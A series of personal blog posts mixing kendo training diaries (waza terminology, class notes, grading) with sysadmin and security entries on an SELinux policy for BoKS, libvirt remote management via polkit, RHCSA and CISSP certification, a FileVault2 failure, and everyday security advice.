In knee injuries you'll often see tearing of the meniscus, which will result in permanent pain and will need to be operated on. That's not the case with me and the doctors think it merely got pinched or hurt. Now, whenever I get pains, that's because the meniscus is being stressed in that same spot. Doc says the pain could go away completely with a few months, or that it could be permanent. It's not dangerous, just annoying. The best way to avoid the pains is to take a good, hard look at my technique in kendo. 


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Kendo waza explained

2013-10-04 22:04:00

Disclaimer: this article was written by a mudansha, for other mudansha. While I have learned a lot the past few years, I am by no means a kendo expert.

To many beginning kendoka, the many different waza we practice can become confusing. Good kihon is where it’s at of course, but if you’re asked to practice men-suriage-men, then you’d better know your suriage-men! I’ve always loved this particular explanation at Kendo Guide because of its simple summary of kendo techniques. Their picture gives an easy overview the most important techniques.

The initial division of techniques is into shikake waza and oji waza, respectively offensive and countering techniques. It’s a matter of initiative: who moves first. The Kendo Guide image can be summarized in the following table.

 

shikake (仕掛け) oji (応じ)
renzoku waza (連続) nuki waza (抜き)
harai waza (払い) suriage waza (刷り上げ)
debana waza (出鼻) kaeshi waza (返し)
hiki waza (引き) uchiotoshi waza (撃落シ)
katsugi waza (担ぐ)  
maki waza (巻き)  

 

The Kendo Guide article does a good job of explaining most of these techniques, but I thought we could add upon that. For example…

 

Nuki versus debana

What’s the difference between a nuki kote and a debana kote? On the floor, during keiko, they may feel the same to most beginners. They see sensei square up against a victim, the victim does an attack and sensei whacks him before the attack lands.

The table above should make the biggest difference clear: timing. Nuki kote, or more famously nuki dou, is performed by evading a strike that is already on its way to you. Debana kote and so on, are done before your opponent has even started attacking. Right before he attacks, you do. It’s a matter of sen (å…ˆ), from “sen wo toru“, “to anticipate“.

Where debana waza are “sen no sen” (先の先), nuki waza are “go no sen” (後の先). With the prior you sense that your opponent is going to act and you counteract at the same time. With the latter you can still prevent your opponent’s action from succeeding by blocking and then attacking. Ai-men is also “sen no sen“. Many great teachers have written about the concept of sen, so I will leave it as an exercise for you to read up on the topic. Kendo World magazine has had a few articles on the concept and Salmon-sensei has also written about it.

The remaining oji waza are all “go no sen“: suriagekaeshi and uchiotoshi. Which brings us to…

 

Kaeshi versus suriage

To many beginners, including myself, kaeshi waza and suriage waza can look very much alike in demonstrations: sensei faces his opponent, opponent attacks, sensei whacks the shinai out of the way and the counter attacks. But as before, these techniques are very different despite both being of the “go no sen” persuasion.

Kaeshi waza are demonstrated in kata #4, where shidachi catches uchidachi’sbokken and slides it away along his own bokken with a twist of the wrists. The counter attack is then made from the wrists as well. Suriage technique on the other hand is shown in kata #5 where shidachi counter attacks uchidachi, hitting the bokken out of the way on the upswing. In suriage techniques your own shinai stays on the center line, it does not move sideways.

But wait…

 

Suriage versus harai

Ivan stumbled upon this matter back in 2006: if both suriage and harai waza move your opponent’s shinai out of the way in an upwards or sideways motion, what’s the difference? Well, for starters there is timing: harai waza is shikake waza where you take the initiative, while suriage waza is oji waza i.e. reactive.

In suriage waza, your opponent’s shinai is caught by your upswing straight through the centerline. It is then moved aside by the curvature and the movement of your own shinai, as a setup of your own attack. In harai waza, you hit your opponent’s shinai upwards or downwards out of the way, before starting your own attack.

 

Seme versus osae versus harai

In all three cases you will see the attacker step in, while the defending shinaidisappears off to the side. It’s just that the way in which the shinai moves aside is very different.

In seme waza it is your indomitable spirit that makes your opponent’s kamaecollapse: you move in strongly and he is overwhelmed. That, or you misdirect his attention by putting force on one target, while truly attacking a second target. In osae waza (“pinning techniques“, like in judo) you hold your opponent’s shinai down and prevent it from moving effectively by moving your shinai over it, coming from the side. It is not a strike, push or shove! You’re merely holding him down. Finally, with harai waza, you make a small and strong strike against your opponent’s shinaithus smacking it out of center. This may be done in either direction, left/right, up/down, whichever is more useful to you.

 

One more sen: sen sen no sen

There are three forms of initiative: go no sen (block and act), sen no sen (act simultaneously) and sen sen no sen (act preemptively). All shikake waza, aside from debana, are classed as sen sen no sen: you are acting before your opponent does.

In other budo which traditionally ascribe to a non-antagonistic approach, sen sen no sen is described not as an act of aggression, but as ensuring that your opponent does not get the chance to attack you. Your opponent has already made up his mind to fully attack you, but he has not started yet. And by using sen sen no sen, you are not letting him. For example: an analysis through aikido and an explanation through karate.

 

A graphical summary

Based on all of the preceding, I have come to a new graphical representation of kendo waza. Below are a Venn diagram and a table that show the most important waza and their various characteristics.

Here is a poster of these graphics, that can be printed for the dojo.

 

The leftovers, what hasn’t been discussed yet

I’m told there are more techniques. Maybe we’ll learn about them some day :)

 

Closing words

To end this essay, I would like to quote Salmon-sensei:

The one thing that I am sure was obvious to most people is that in kendo, as in the rest of life, you have to “make it happen”. Shikake waza does not work unless you break your opponents centre and oji waza is effective only if you control your opponents timing and pull him into your counter attack.

We are reminded of this in class, if not every week! What ever you do, you need to have an acting role in it. Simply waiting does not work!

I would like to thank both Heeren-sensei and Salmon-sensei for their explanations through email. They helped me a lot in figuring this stuff out.


kilala.nl tags: , ,

View or add comments (curr. 0)

Running BoKS on SELinux protected servers

2013-10-01 09:00:00

I have moved the project files into GITHub, over here

FoxT Server Control (aka BoKS) is a product that has grown organically over the past two decades. Since its initial inception in the late nineties it has come to support many different platforms, including a few Linux versions. These days, most Linuxen support something called SELinux: Security Enhance Linux. To quote Wikipedia:

"Security-Enhanced Linux (SELinux) is a Linux kernel security module that provides the mechanism for supporting access control security policies, including United States Department of Defense-style mandatory access controls (MAC). It is a set of kernel modifications and user-space tools that can be added to various Linux distributions. Its architecture strives to separate enforcement of security decisions from the security policy itself and streamlines the volume of software charged with security policy enforcement.

Basically, SELinux allows you to very strictly define which files and resources can be accessed under which conditions. It also has a reputation of growing very complicated, very fast. Luckily there are resources like Dan Walsh' excellent blog and the presentation "SELinux for mere mortals".

Because BoKS is a rather complex piece of software, which dozens of binaries and daemons all working together across many different resources, integrating BoKS into SELiinux is very difficult. Thus it hasn't been undertaken yet and thus BoKS will not only require itself to be run outside of SELinux' control, it actually wants to have the software fully disabled. So basically you're disabling one security product, so you can run another product that protects other parts of your network. Not so nice, no?

So I've decided to give it a shot! I'm making an SELinux ruleset that will allow the BoKS client software to operate fully, in order to protect a system alongside SELinux. BoKS replicas and master servers are even more complex, so hopefully those will follow later on. 

I've already made good progress, but there's a lot of work remaining to be done. For now I'm working on a trial-and-error basis, adding rules as they are needed. I'm foregoing the use of sealert for now, as I didn't like the rules it was suggesting. Sure, my method is slower, but at least we'll keep things tidy :)

Over the past few weeks I've been steadily expanding the boks.te file (TE = Type Enforcement, the actual rules):

v0.32 = 466 lines
v0.34 = 423 lines
v0.47 = 631 lines
v0.52 = 661 lines 
v0.60 = 722 lines 
v0.65 = 900+ lines 

Once I have a working version of the boks.te file for the BoKS client, I will post it here. Updates will also be posted on this page.

 

Update 01/10/2013:

Looks like I've got a nominally working version of the BoKS policy ready. The basic tests that I've been performing are working now, however, there's still plenty to do. For starters I'll try to get my hands on automated testing scripts, to run my test domain through its paces. BoKS needs to be triggered to just about every action it can, to ensure that the policy is complete.

 

Update 19/10/2013:

Now that I have an SELinux module that will allow BoKS to boot up and to run in a vanilla environment, I'm ready to show it to the world. Right now I've reached a point where I can no longer work on it by myself and I will need help. My dev and test environment is very limited, both in scale and capabilities and thus I can not test every single feature of BoKS with this module. 

I have already submitted the current version of the module to FoxT, to see what they think. They are also working on a suite of test scripts and tools, that will allow one to automatically run BoKS through its paces which will speed up testing tremendously. 

I would like to remind you that this SELinux module is an experiment and that it is made available as-is. It is absolutely not production-ready and should not be used to run BoKS systems in a live environment. While most of BoKS' basic functions have been tested and verified to work, there are still many features that I cannot test in my current dev environment. I am only running a vanilla BoKS domain. No LDAP servers, no Kerberos, no other fancy features. 

Most of the rules in this file were built by using the various SELinux troubleshooting tools, determining what access needs to be opened up. I've done it all manually, to ensure that we're not opening up too much. So yeah: trial and error. Lots of it. 

This code is made available under the Creative Commons - Attribution-ShareAlike license. See here for full details. You are free to Share (to copy, distribute and transmit the work), to Remix (to adapt the work) and to make commercial use of the work under the following conditions:

So. How to proceed? 

  1. Build a dev/test environment of your own. I'm running CentOS VMs using Parallels Destop on my Macbook. Ensure that they're all up to date and that you include SELinux with the install. Better yet, check the requirements on this page
  2. I've got a BoKS master, replica and client, all version 6.7. However, installing BoKS on CentOS is a bit tricky and requires some trickery.
  3. Download the BoKS SELinux module files
  4. Put them in a working directory, together with a copy of the Makefile from /usr/share/selinux/devel/
  5. Run: make. If you use the files from my download, it should compile without errors. 
  6. Run: semodule -i boks. The first time that you're building the policy you'll need to install the module (-i). After that, with each recompile you will need -u, for update. 
  7. Run: touch /.autorelabel. Then reboot. Your system will change all the BoKS files to their newly defined SELinux types. 
  8. Run: setenforce 1. Then get testing!  Start poking around BoKS and check /var/log/audit/audit.log for any AVC messages that say something's getting blocked. 

I'd love to discuss the workings of the module with you and would also very much appreciate working together with some other people to improve on all of this. 

 

Update 05/11/2014:

Henrik Skoog from Sweden contacted me to submit a bugfix. I'd forgotten to require one important thing in the boks.te file. That's been fixed. Thanks Henrik!

 

Update 11/11/2014:

I have moved the project files into GITHub, over here


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Kendo practice: intense and awesome

2013-09-11 07:25:00

 

The past few weeks have been pretty intensive! Aside from the fact that I need to take a few days off from kendo these weeks (birthdays and such), it's been hard work. Awesome, hard work. They're working us hard in both Almere and in Amstelveen.

Yesterday's class in Amstelveen again put focus on te-no-uchi training and the left hand. After the usual suburi and warming-up, we were again instructed to practice men strikes with motodachi. Five repetitions of fifty shomen, followed by two repetitions of thirty double shomen. Heeren-sensei reminded us that it's not just an exercise to make our arms tired, but that we're really here to practice our left hand. Like before:

When it comes to breathing, don't try to stick to a rhythm of in-and-out breathing that attempts to match your striking pattern. Instead, take a deep breath and keep on breathing out until there's no more. Then breathe in again. Heeren-sensei always tries to get in as many strikes with one breath as possible. 

We were all reminded that breathing should not be done "high" in the lungs, but "low" and from the "hara". In both Japanese and Chinese arts, the "hara" (or the "lower dantian", 下丹田) is said to be the seat of your energy and to be the physical center of gravity of your body. (more here) By breathing from the hara one ensures at least two things:

  1. #mce_temp_url#You are regulating your breathing and getting enough oxygen without hyperventilating.
  2. You are building force in both your body and your kiai/kakegoe.

A way to check that you're breathing right, is to tie your hakama himo pretty tightly around the hara, which ensures that you feel your hakama tightening when breathing in. A very clear difference was presented, between a "high" and a "low" kakegoe. The one produced from the hara was louder, solid and rolls over your opponent.

Our left-hand training continued after seiza, with kirikaeshi interval training and normal kirikaeshi after jigeiko. In both exercises we were told to pay close attention to aite's left hand. It should not be going sideways or wide, but through the center line. "Helicoptering" should be avoided at all costs. Even in kirikaeshi, strikes will be straight for the most part only swerving left or right close to the end. If you feel that aite's left hand is straying, drop your shinai so he will hit your men thus alerting him of the problem.

Twenty minutes of jigeiko were had. Heeren-sensei impressed upon us the importance of practicing the lessons from kihon keiko in jigeiko.

In my case I fought three people and I am happy to see my stamina returning. I did not need to sit down between bouts, but only took a short one minute breather. I feel confident about all three rounds, against Miyahara-sensei, Zicarlo-sempai and Raoul-sempai. With Raoul I took on a student role, letting him coach and warn me extensively regarding my posture and about tension in my muscles. With Machi and Zicarlo, I took a more competitive approach which turned out very well. I tried to maintain a strong kamae and looked them both squarely in the eyes (attempting enzan no metsuke). Whenever I attacked, I tried to stick to the basics: kote-men, oki-men and hayai-men. I also did many hiki-men against Zicarlo. I'm very happy that he congratulated me on my jigeiko, remarking "You don't attack often, but when you do it's good and tidy!" I'm glad that my men strikes often hit the datotsubui.

Recently, Marli has been pressing me to attempt my shodan grading. I've been holding off on that, mostly because of insecurity. I think that, as shodan, one has an exemplary role and I feel that I cannot set a proper example if I have to keep bowing out due to exhaustion. Then again, both Heeren-sensei and Jeroen-sempai reminded me that everyone can tell I'm putting in my best effort and that I keep going despite my exhaustion. Combining all of that with Marli's continued super support and yesterday's class, I now feel more confident about attempting the December grading. I'll have a chat with the NKR people to see if I've met the conditions.

 


kilala.nl tags: , ,

View or add comments (curr. 0)

Start of the new kendo season

2013-08-28 06:12:00

Last week saw the start of the 2013/14 kendo season at Renshinjuku dojo. I'm very happy that Heeren-sensei is joining us again after his prolonged absence. On the other hand, I still haven't seen any of the other teachers including Tsuyuguchi-sensei. As per yesterday we moved to our new training hall at Jane Addamslaan, now that the Westend hall is getting decomissioned. 

The first two classes of the season were spent on rebuilding our physical condition after a few weeks of slacking off* and on improving tenouchi (手の内, lit. "the inside of your hand"). Tenouchi is the term used to describe a specific kind of grip or movement, made using your hands and wrists at the moment when a strike connects. Geoff Salmon-sensei has written a lot about it

Heeren-sensei reminded us of the importance of training at home. Once or twice a week in the dojo isn't enough if you want to make real progress! Doing suburi will keep you agile and will help with tenouchi. And making a striking dummy will even let you do basic kihon practice! You can even do suburi inside, but making a suburito from old shinai parts.

After the usual warmup routing, we proceeded to bogu-less exercises. Motodachi receives and counts men strikes on his shinai, which is held in front of his face. Each person needs to do fifty strikes, totaled up to 150 by rotating three times. Last week we also included two times fifty hayai suburi. Heeren-sensei asked us to do these exercises with three things in mind:

  1. The upswing reaches all the way back, tapping your rear.
  2. The upswing has your left hand passing right over your head, almost combing through your hair.
  3. The strike should be made strongly, focusing on the left hand.

These three factors combined help you train tenouchi.

For similar reason we then proceed to interval training, with each couple doing kirikaeshi all 'round the perimeter of the dojo floor. Each person needs to make a minimum of four rounds. Heeren-sensei pointed out the following:

Class is finished with 10-15 minutes of free jigeiko and kirikaeshi.

*: In my case that's three months due to my knee injury. After visiting my GP I stopped kendo a month early. Despite the doctor's expectations it took more than two weeks to get rid of all the pains. More like six to eight. After that the pain was gone, but reappeared after last week's class. I've now bought a knee brace, which appears to be helping a lot. I still need to have a checkup by a physio-therapist.


kilala.nl tags: , ,

View or add comments (curr. 0)

Installing CentOS Linux as default OS on a Macbook

2013-08-12 16:46:00

While preparing for my RHCSA exams, I was in dire need of a Linux playground. At first I could make do with virtual machines running inside Parallels Workstation on my Macbook. But in order to use Michael Jang's practice exams I really needed to run Linux as the main OS (the tests require KVM virtualization). I tried and I tried and I tried but CentOS refused to boot, mostly ending up on the grey Tux / penguin screen of rEFIt

On my final attempt I managed to get it running. I started off with this set of instructions, which got me most of the way. After resyncing the partition table using rEFIt's menu, using the rEFIt boot menu would still send me to the grey penguin screen. But then I found this page! It turns out that rEFIt is only needed in order to tell EFI about the Linux boot partition! Booting is then done using the normal Apple boot loader!

Just hold down the ALT button after powerin up and then choose the disk labeled "Windows". And presto! It works, CentOS boots up just fine. You can simply set it to the default boot disk, provided that you left OS X on there as well (by using the Boot Disk Selector).


kilala.nl tags: , , , ,

View or add comments (curr. 0)

RHCSA achieved

2013-08-12 16:23:00

Huzzah! As I'd hoped, I passed my RHCSA examination this morning. Not only is this a sign that I'm learning good things about Linux, but it also puts me 100% in the green for my continued CISSP-hood: 101 points in domain A and 62 in domain B: 163/120 required points.

I can't be very specific about the examination due to the NDAs, but I can tell a little bit about my personal experience. 

The testing center in Utrecht was pleasant. It's close to the highway and easily accessible because it's not in the middle of town. The amenities are modern and customer-friendly. The testing room itself is decent and the kiosk setup is exactly as shown in Red Hat videos. Personally, I am very happy that RH started with the kiosk exams because of the flexibility it offers. With this new method, you can sit for RHCSA/RHCE/etc almost every day, instead of being bound to a specifc date. 

The kiosk exam comes with continuous, online proctoring meaning that you're not stuck of something goes wrong. In a normal exam situation you'd be able to flag down a proctor and in this case you can simply type in the chatbox to get help. And I did need it on two occasions because something was broken on the RH-side. The online support crew was very helpful and quick to react! They helped me out wonderfully!

I prepared for the test by using two of Michael Jang's books: the RHCSA/RHCE study guide and the RHCSA/RHCE practice exams. If you decide to get those books, I suggest you do NOT go for the e-books because the physical books include DVDs with practice materials. Without going into details of the exams, I found that Jang's books provided me ample preparation for the test. However, it certainly helps to do further investigation on your own, for those subjects that you're not yet familiar with. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Security measures all of us can take - part 3

2013-08-10 22:53:00

Here's another follow-up with regards to security matters I believe everybody should know. It's a short one: Email is not safe.

It has been said that you "don't put anything in an email that you wouldn't want to see on the evening news." It's not even a matter of the NSA/FBI/KGB/superspies. Email really is akin to writing something on a postcard: it's legible to anyone who can get his hands on it. And like with the postal service, many people can get their hands on your email. 

Here is an excelent and long read on the many issues with email. But to sum it up:

  1. In general, emails are transfered and stored unencrypted. Anyone on the same network as you can read them in passing. Anyone managing an email server can read the mails stored on them.
  2. Source/sender information is easily spoofed. There is no way to guarantee that an email actually came from whoever's name is at the top. 

These two problems can be worked around in a few rather technical manners, most of which are not very user friendly. The most important one is to use GPG/PGP, which allows you to encrypt (problem 1) and to digitally sign (problem 2) the emails that you send. It certainly helps, but it introduces a new problem: key exchange. You now need to swap encryption keys with all people with whom you'll want to swap emails. But at least it's something. 

In the mean time:

Want to send me an encrypted email? Here's my public key :)


kilala.nl tags: , ,

View or add comments (curr. 0)

An update on certifications

2013-08-07 22:09:00

Here's a follow-up post to last year's "Confessions of a CISSP slacker".

By the end of last year I was woefully behind on my CPE (continued professional education) requirements, which are needed to retain my CISSP certification. Not only is CISSP a darn hard exam to take, but ISC2 also need you to garner a minimum of 120 study points each three years. In my first two years, I didn't put in much effort meaning I had a trickle of 51 points out of 120. Thus my emergency plan for making it to 120+ points in the span of a year.

All the calculations were made in the linked article and then I set things into motion. My resolve being strengthened by my personal coach I put together a planning for 2013 that would ensure my success. And my hard work has been paying off, because as of tonight I have now achieved the first milestone: the minimum of 80 points in "domain A" (screenshot above). 

The heaviest hitters in obtaining these 29 points are:

The remaining points were garnered by attending online seminars and by perusing a number of issues of InfoSecurity Professional magazine

Next monday I'm scheduled to be taking my RHCSA (Red Hat Certified System Administrator) exam. I've been working hard the past three months and I'm confident that I'll pass the practical exam on my first go. If I do, that's a HUGE load of CPE because all the study time counts towards my CISSP. That would be roughly 20 hours in domain A (security-related) and 60 hours in domain B (generic professional education). And that, my friend, would put me squarely over my minimal requirements! And I haven't even finished all the items on my wishlist :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Public and private parts of this site

2013-07-24 23:38:00

As I wrote earlier I have decided to clamp down on what is publicly published about our lives. This means that >80% of my blog has been turned into a private affair, with only work-related materials still being available to the whole world.

Now that my Macbook has crashed and I need to spend a lot of time waiting for the backups to restore, I have spent roughly eight hours updating my CMS code. It was an interesting learning experience and now this site has a basic login/logout functionality. Logging in will simply let you see the website in all of its original glory.

If I haven't contacted you yet about a username+password and you'd like one, drop me an email.


kilala.nl tags: , , ,

View or add comments (curr. 0)

When FileVault2 fails, it fails hard

2013-07-23 20:54:00

mac os x boot no access screen

For quite a while now I've had my Macbook's boot drive protected using Apple's full-disk encryption, called FileVault2. I've been very pleased with the overall experience and with the fact that the performance hit wasn't too big. All in all it's a nice tool. 

But today i learned that when (if) FileVault2 fails, it fails hard. 

I was on the train to work, fiddling with my Linux VMs and the virtual NICs. Since something wasn't working right, I reckoned I'd reboot the whole laptop and see if that wouldn't clear things up. Heck, my last reboot was at least 20 days ago, so why not?

Well, turns out that my Macbook wouldn't boot anymore. After entering my FileVault password the system would attempt to boot, halting at the "no access" symbol. Not good.

Basically, the boot loader's working and the part that knows my FileVault passwords was also okay. However, poking around with diskutil on the command line quickly showed that the CoreStorage config for my boot drive had gotten corrupted. It showed disk0s2 as being a CoreStorage physical volume, but this was also listed as "failed". There were no logical volumes to be found. Ouchie. This was confirmed by using the diskutil GUI, which greyed out the option to open the encrypted volume.

The only recourse: to delete the failed volume group and to start anew. I'm restoring my backup image as I write this, after which I'll be restoring my homedir through Time Machine, as before. I'm aware that both Filevault and Time Machine can be a bit flaky, so I'm very lucky that they haven't failed on me simultaneously. 

This is all highly ironic, as my Macbook died only a few days before the arrival of my newly ordered Macbook Air. *groan* Now I'm spending a few hours recovering a laptop, which I'll only be using for four more days. Ah well.

This is again a gentle reminder to all you readers to make proper backups. In my case I'm lucky to only lose a few weeks worth of tweaking my Parallels virtual machines, as I chose not to include those with my Time Machine backups (they'd backup multiple gigs every hour). 


kilala.nl tags: , , ,

View or add comments (curr. 0)

KVM, libvirt, polkit-1 and remote management

2013-07-16 22:00:00

With Red Hat's default virtualization software KVM, it's possible to remotely manage the virtual machines running on a system. See here for some regular 'virt-ception'.

Out of the box, libvirt will NOT allow remote management of its VMs. If you would like to run a virt-manager connection through SSH, you will need to play around with Polkit-1. There is decent documentation available for the configuration of libvirt and Polkit-1, but I thought I'd provide the briefest of summaries.

Go into /etc/polkit-1/localauthority/50-local.d and create a file called (for example) 10.libvirt-remote.pkla. This file should contain the following entries:

[libvirt Remote Management Access]
Identity=unix-group:libvirt
Action=org.libvirt.unix.manage
ResultAny=yes
ResultInactive=yes
ResultActive=yes

This setup will allow anyone with (secondary) group "libvirt" to manage VMs remotely. That's a nice option to put into your standard build!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Security measures all of us can take - part 2

2013-07-14 23:28:00

As a follow-up to my previous post on common sense I'd like to touch on Internet privacy. 

A few months ago I decided it was time to clean up my presence in social media. Using various plugins and a with a lot of patience I managed to clear out every post I had ever made to Facebook, Google Plus and Reddit. This decission followed after one-too-many privacy changes on Facebook and the realization that despite my best intentions I was still sharing a lot of information. I now regularly go over all of my social profiles to ensure nothing is "leaking out", as all parties involved have proven not to care too much about your privacy. 

What's more, is that I've come to reconsider my online profile. You know how we warn our kids never to give out their real names on the Internet? Or their address and whatnot? Isn't it ironic then, that I've been doing just that for well over a decade? Not only that, but I've kept a pretty detailed diary and have interacted with thousands of people through dozens of forums. I've used the same alias in all of those places, making myself very identifiable. 

Better late than never, but I've finally come to the decission to try and break down that online persona as well as possible. Wherever I can I've taken to changing my usernames and identifiers. That's one hint for people: don't use the same name everywhere.

A second point: on many forums it's not possible to delete all the posts you made. Most forums are of the opinion that providing an option to delete one's whole history is detrimental to both the discussions and to the content of their site. And of course they're right. So if you want to start culling posts you will either need to be selective and pick the worst stuff, or you'll spend hours upon hours manually deleting each and every post you made. Luckily there are tools to help you out, like Greasemonkey scripts that can automate browser tasks: to delete reddit comments, or to clean your facebook timeline. They're not foolproof, but it helps.  

Remember: just about everything on the Internet is forever. If it's not people making copies of your photos or text, it's companies! The famous Internet wayback machine regularly snapshots whole websites for posterity. And sites like Topsy.com shamelessly take your whole Facebook/Google+/Twitter feed and retain fully searchable copies on their own website. 

It's been said before and it'll be often repeated: think about what you post and to whom you make it available. Review your privacy settings on social media frequently and think hard if you want something to be shared across the globe. 

That's why I've decided to dedicate the public version of this website to my professional activites: work, programming, learning. All of the other things will be passworded and only available to myself and my family. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Finishing the 2012/13 season early

2013-06-16 10:35:00

Ever since the 04/28 Centrale Training my right knee has been giving me trouble. Sharp pains below the disc, probably where a bunch of muscles connect, occur whenever I walk stairs or when I rotate my leg. 

Aside from having to see a doc, I've decided to finish the 2012/13 season a bit early. My knee needs rest. I'll still be attending class for the last few weeks of the year, but only for mitori geiko, for social contacts and to help out with shinai maintenance etc. That's exaclty what I did yesterday: I fixed six shinai, had a short chat with a few people and helped out Kris-fukushou here and there.


kilala.nl tags: , ,

View or add comments (curr. 2)

Security measures all of us can take

2013-06-10 16:47:00

Recently I've been on a bit of a security-binge at home. This blog post may have been tagged as "geeky", but as the title says I'll be going over a few things all of us should be familiar with. At least, that's my opinion... These days you're taking risks if you don't use these measures.

1. NFC security

Per this week, ING Bank are providing customers with NFC equipped debit cards. It's not optional, it's in every single card. NFC, Near Field Communications, is a technical term for what most of us will know as "contactless transactions": the chip card used in dutch public transport, or the ICOCA/Pasmo/Suica cards from Japan. In ING's case, this means that your debit card can now be used for payments, simply by holding your case close to a payment terminal. Payments under €25 will not require an authentication using PIN and payments are charged directly to your account. It is not a charge card, like Suica or OV Chip

Because NFC features will be featured in more and more products, now is the time to start thinking about securing your cards. Your bank card, your credit card (Visa also has NFC), your public transport card and of course also the access cards for the office! While many parties tout an effective range of 2-4cm for NFC, in actuallity there have been many test cases where NFC cards were activated over ranges from 30cm to several meters.

I'm calling it right now: the buzzword for 2014/2015 will be "crowd skimming".

crowd skimming nfc rfid clone steal

Miscreants will simply hide an NFC skimmer in a backpack and start walking through busy crowds. Imagine how many cards could be copied, or transactions could be made by walking around a train station or a music festival!

Protection is easy and I'm sure that by 2024 most wallets sold will come with this feature: shielding. There are many DIY projects online for aluminum lined wallets, but they're also for sale. DIFRWear is a famous example, as is the dutch designed Secrid. Instead of spending €25-€50, I got a Safe Wallet from Marskramer at a low €2,99 (free shipping)!

2. Passwords

Everyone's heard it before: "don't use simple passwords!

Make your password hard to guess, don't use the same password for multiple accounts, change your passwords regularly. Most people know these rules (best practices?), but many don't adhere to them. And I understand! They're a hassle! Every few months I need to manually visit over fifty websites to change passwords and it's a pain. But that doesn't mean you shouldn't do it!

Luckily password managers will make life a lot easier for you. There are many to choose from and I went with 1Password. At its most basic, 1Password becomes your safe storehouse for all your passwords (and other confidential information). But where it shines is its browser integration, that will allow you to automatically login to your websites. For example, I visit Facebook.com and ask 1Password to login for me, which it does. Done!

The great thing about this, is that it makes complex passwords effortless for you! Have a hard time remembering a sixteen character, random string of letters and numbers? You won't need to, because 1Password fills it out for you. And access to your password vault is obviously protected by one very strong password, hence the name of the product :)

If you'd like to take your passwords with you on the road, for use on another computer, then 1Password can provide you with a smartphone app for iOS or Android. You'll always have all your passwords with you, safely encrypted and protected.

EDIT: The newly announced iCloud Keychain will be another good option for Mac OS users. And of course Keeppass is cross-platform and free. Also, be sure to check out the different managers as some are not without issues.

3. Multi-factor authentication

The problem with username-password authentication is that in many cases your username is plainly obvious. Often it's your email address, some permutation of your name or a nickname that's out in the open. That leaves only your password as the true secret and as was discussed at #2, often it's not a very good secret to begin with!

One solution to this problem is to add another factor to the authentication step. Next to using something that you know (name and password) you'll often see the use of something that you have, like an OTP token.

Many websites will allow you to enable two-factor, or multi-factor authentication. E-Banking sites have historically used random number generating tokens, or "calculators". But these days it's becoming common for more and more sites and applications. Facebook, LinkedIn, Google, Wordpress, Evernote, all of them let you use a smartphone app or they'll send you an SMS with a one-time code. Thus your smartphone becomes the "something you have" factor, which will generate codes for you. 

Personally, I've come to use Google Authenticator for many of my accounts. It's free and it's open source. Best of all: while it may be Google in name it does NOT run on Google servers. It's 100% between your phone/PC and the account in question. Google Authenticator is wonderfully flexible, insofar that it can be integrated with any service you can think of. Obviously it's being used by websites, but it can also be integrated into applications (like Evernote) and into PAM-compatible Unix services so you can use it for your SSH logins.

4. Whole disk encryption

Most of us don't give much thought to all the data stored on our computers, but to be honest: for most of us our whole lives are on there. Emails, documents, photographs and plenty of secrets. Bank details, credit card numbers, passwords and confidential data. Is it really a smart idea to leave that stuff unprotected, to be read by anyone willing to steal your stuff? No.

That's where whole-disk encryption comes in. This solution renders your whole hard drive unreadable, unless you have the password. Your computer won't boot, nor can anyone go through your files, with the password. In this day and age most computers are also fast enough for you not to notice any real slowdown thanks to the encryption. 

There are plenty of commercial products available, but there's also free stuff out there. TrueCrypt is free and open source and is cross-platform (Windows, Linux, Mac OS X). BitLocker is included with some versions of Windows and FileVault comes standard with every Macintosh since Lion / 10.7. 

EDIT:

Darn, I'm not the first one to coin "crowd skimming". This blog used it earlier, but to refer to copyright trolling bittorrent users, sueing them for damages.


kilala.nl tags: , , ,

View or add comments (curr. 3)

Here's the mountain, now start climbing

2013-05-26 20:28:00

Today I passed my ikkyu exam in kendo.

Ikkyu, being the final grade before shodan ("black belt"), means that you're on your way to understanding kendo and that you almost grasp all of the basics. Almost. The real hard work starts now :)

As I said to my friends who also took their exams today: "The introductory class is over, we are now rank beginners". Another analogy would be that a guide has shown me the mountain and that I now need to start climbing it. My foot is on the first step of the stairway. 

I am very happy that all of the help my sensei and sempai have given me and that my 2.5 years of effort have led to at least some progress. Also, obviously I wouldn't have come this far without the continued support of my lovely wife and of my friends who cheer me on.

If anyone's interested, my dear friend Menno shot a video of my kirikaeshi and my two jitsugi. I was very happy to hear his reaction about my kendo, to paraphrase: "This is cool stuff! I now understand what you meant when you said your lung capacity was useful; your kiai kicks ass!". ( ^_^) I'm the one starting on the left, as Tomokiyo-san put it: "Lucky number 7".

ThomasIkkyu.m4v


kilala.nl tags: , , ,

View or add comments (curr. 4)

A sobering review

2013-05-18 21:45:00

a graph

"I don't think you understand what this thing is for." he said, gesturing with his shinai.

It didn't hurt as much as Zicarlo-sempai's stab to the stomach, but it stung a bit anyway. Only a little though and I'm putting aside the emotional aspect, to analyze the technical message behind it. Instead of sulking, it makes me want to train three or four times each week! Were I not a family man, I'd sign up with Museido right away for more practice.

But let's backpaddle a bit to the beginning. 

Today's class in Amstelveen was great, with a big turnup and an all-star cast. Our usual crew was expanded with a few high placed teachers and students from Museido and Fumetsu. A chance for us all to learn something new!

Class followed the usual structure: kata, warming up, kihon, jigeiko. To prepare for my upcoming ikkyu exam I practiced kata with Zicarlo and Hans, learning the fifth kata along the way. I'm actually pretty happy with how that went, though there wasn't much tension between us. That's something to work on. 

Kihon practice went alright, though I let myself coast through it too much. I often let my body run on autopilot instead of paying attention and being fully aware of what's going on. That's not right. And yes, my chisai techniques are still awful. Given my lack of stamina I'm happy to say I did not take the short break that was offered between kihon and jigeiko, but instead jumped into a little shinsa practice with Zicarlo. "Every week a little stronger" as I keep telling myself in mokuso.

Seeing how the chance rarely occurs, I lined up with Mark Herbold-sensei for my second jigeiko. I first met him a few weeks ago at the CT where he impressed me with his teaching style and personality. After Tsuyuguchi-sensei's admonishment ("You should hit!") I'd picked up my pacing considerably, so I tried my best with Mark. In my mind I was not backing down and I was giving it multiple shots in a row. Compared to a few weeks ago I thought I was doing better. Maybe I was, meaning that I was pretty darn bad a few weeks ago ;)

After class I went to pay my respects and to get some feedback from Mark. You already know how he opened: "I don't think you understand what this thing is for." he said, gesturing with his shinai. Direct. No sugar coating. But definitely not the only thing he said, because he took quite some time to explain. 

